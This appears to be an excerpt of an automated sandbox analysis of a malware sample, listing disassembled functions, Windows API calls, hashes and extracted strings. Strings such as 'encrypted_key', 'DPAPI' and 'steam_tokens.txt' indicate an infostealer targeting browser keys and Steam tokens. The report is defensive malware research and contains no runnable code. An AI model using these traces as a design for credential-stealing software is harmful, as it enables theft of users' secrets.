                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: a2417292fce26ce0c6b881a5df648ca31f04bf13c606774050b7736e4c0dcd31
                                    • Instruction ID: f8455512c1cdbfb2c8eff6b829e2de4521518abe8874f6e8ca995db39fd79b3b
                                    • Opcode Fuzzy Hash: a2417292fce26ce0c6b881a5df648ca31f04bf13c606774050b7736e4c0dcd31
                                    • Instruction Fuzzy Hash: F9419031B102099BCB21EFF8DC856EEBBF4AF56314F048469E915AB253EA30ED40C791
                                    Function 000BE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BEA24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEA53
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BEA61
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BEA7A
                                    • lstrcat.KERNEL32(?,00E68820), ref: 000BEA8D
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BEA9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 43f5db71febe888b595a3f2f30f08c790a59175e4bfcba5cf9304aafeb0f6661
                                    • Instruction ID: 26103074416a1e829ae37c9b9beb95584c7c4644d094cdbe8b6cdbe803b4561e
                                    • Opcode Fuzzy Hash: 43f5db71febe888b595a3f2f30f08c790a59175e4bfcba5cf9304aafeb0f6661
                                    • Instruction Fuzzy Hash: FE416771E11118EFCB55EBA8EC46EED73B8BF58300F004469B61A9B291DF709E848B51
                                    Function 000BECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BECDF
                                    • lstrlen.KERNEL32(00000000), ref: 000BECF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BED1D
                                    • lstrlen.KERNEL32(00000000), ref: 000BED24
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 000BED52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 2392a20c658e4be3433ffbc8f5bc0cbd799fdf5c539ce69f3a9e380ce7a61588
                                    • Instruction ID: 91be87a207eff26efc71b5af0fd2a66421369a0e32d9fcbc05bcd48a56de004e
                                    • Opcode Fuzzy Hash: 2392a20c658e4be3433ffbc8f5bc0cbd799fdf5c539ce69f3a9e380ce7a61588
                                    • Instruction Fuzzy Hash: 2F316131A115559BC721BBBCEC4AADE7BA5AF52700F044135F846DB623EB34DC0687D2
                                    Function 000A9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,000A140E), ref: 000A9A9A
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,000A140E), ref: 000A9AB0
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,000A140E), ref: 000A9AC7
                                    • ReadFile.KERNEL32(00000000,00000000,?,000A140E,00000000,?,?,?,000A140E), ref: 000A9AE0
                                    • LocalFree.KERNEL32(?,?,?,?,000A140E), ref: 000A9B00
                                    • CloseHandle.KERNEL32(00000000,?,?,?,000A140E), ref: 000A9B07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: a5e949656521d977ff27f5245a18a5b58396bf15456462abd3ceef0a84e0318d
                                    • Instruction ID: a8a7a07854dc49c643a6203b5f7761c62faf121b726c0571bdddd07cf0857dd3
                                    • Opcode Fuzzy Hash: a5e949656521d977ff27f5245a18a5b58396bf15456462abd3ceef0a84e0318d
                                    • Instruction Fuzzy Hash: 1F112E71A11219AFEB10DFA9ED88EAF77ACEB05740F10416AF91596280EB70DD40CBA1
                                    Function 000C5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5B14
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 000C5B7C
                                    • memmove.MSVCRT(00000000,?,?), ref: 000C5B89
                                    • memmove.MSVCRT(00000000,?,?), ref: 000C5B98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: ee35e8151e4518e506a5bc68a7d41794ea79127e69da85e913d3fa616e790861
                                    • Instruction ID: 87a1920c0dc03bbee58ca873ca818136ebb0d96535280706e958048ad83ec35f
                                    • Opcode Fuzzy Hash: ee35e8151e4518e506a5bc68a7d41794ea79127e69da85e913d3fa616e790861
                                    • Instruction Fuzzy Hash: B9416F75B005199FCB18DF6CCC95BAEBBE5EB88310F15822DE909E7384E730AD408B90
                                    Function 000B7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D58
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1D5
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D76
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: e8e94d432b7a225f15906654f8b7d9c1829f75b23fe0b6e7d2fbcf20ece83d96
                                    • Instruction ID: 51061fea9d6b950a5ceb2c5dab3f11a0fa3a6f5ceb09807e3470fe25826be892
                                    • Opcode Fuzzy Hash: e8e94d432b7a225f15906654f8b7d9c1829f75b23fe0b6e7d2fbcf20ece83d96
                                    • Instruction Fuzzy Hash: B421E6323083008BD720DE6CD880ABAB7F5EFE5760B204A2EE55ACB741D770DC408761
                                    Function 000C33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C33EF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C33F6
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 000C3411
                                    • wsprintfA.USER32 ref: 000C3437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 60b68b77f2923ff01aba8c0f5a90737bb8830b088772bc378af2066153a2ec9c
                                    • Instruction ID: 3725af8104e6f9e9863db4c80d3859e79d3eb8351496a6995a3553dbf849b52e
                                    • Opcode Fuzzy Hash: 60b68b77f2923ff01aba8c0f5a90737bb8830b088772bc378af2066153a2ec9c
                                    • Instruction Fuzzy Hash: FD01B1B1E14218AFDB14DF98EC49FAEB7B8FB45711F00422AFA06E7380D7749D0086A5
                                    Function 000C926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit$__getptdfree
                                    • String ID: Xu$Xu
                                    • API String ID: 2640026729-1328518658
                                    • Opcode ID: c95e3faf95cd2aa39d2fcfc0d4cf103af09fe4c416a47a99d1726422e74ac2c9
                                    • Instruction ID: 471b0cb329fd20c2efb1d7401da8647654b2a4eb3bf8bb56abd59c787793dff8
                                    • Opcode Fuzzy Hash: c95e3faf95cd2aa39d2fcfc0d4cf103af09fe4c416a47a99d1726422e74ac2c9
                                    • Instruction Fuzzy Hash: 5C01F933D46B21A7E761AB699409FDDB3A07F01B10F55000EE88867681DF346D41DFE6
                                    Function 000BD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00E6D228,00000000,00020119,?), ref: 000BD7F5
                                    • RegQueryValueExA.ADVAPI32(?,00E6DFD8,00000000,00000000,00000000,000000FF), ref: 000BD819
                                    • RegCloseKey.ADVAPI32(?), ref: 000BD823
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BD848
                                    • lstrcat.KERNEL32(?,00E6DF48), ref: 000BD85C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 0b92576d94e96efd6540ade151a57e1437a5817640d8a476306243544f8481a5
                                    • Instruction ID: bf191910249d51760a1453bc1df2ead111a2fd212895f93440ffd576baefbf21
                                    • Opcode Fuzzy Hash: 0b92576d94e96efd6540ade151a57e1437a5817640d8a476306243544f8481a5
                                    • Instruction Fuzzy Hash: 56413175A1010CEFCB54EF68EC96FDE77B8AB54344F404065B50997262EE30AE858F91
                                    Function 000B7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B7F31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B7F60
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B7FA5
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B7FD3
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B8007
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: b2db658c18486f3665742af20079b47f3d940eea79e84bc736bff9a1be72abac
                                    • Instruction ID: e7cafee1c61b427fb4487eed2e94bd2e621b51fb5520baca511c82932a938c23
                                    • Opcode Fuzzy Hash: b2db658c18486f3665742af20079b47f3d940eea79e84bc736bff9a1be72abac
                                    • Instruction Fuzzy Hash: 11417F3090411ADFCB20DF68D884EEE77F4FF95340B1141A9E809AB351DB70EA55CB95
                                    Function 000B8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B80BB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B80EA
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B8102
                                    • lstrlen.KERNEL32(00000000), ref: 000B8140
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B816F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
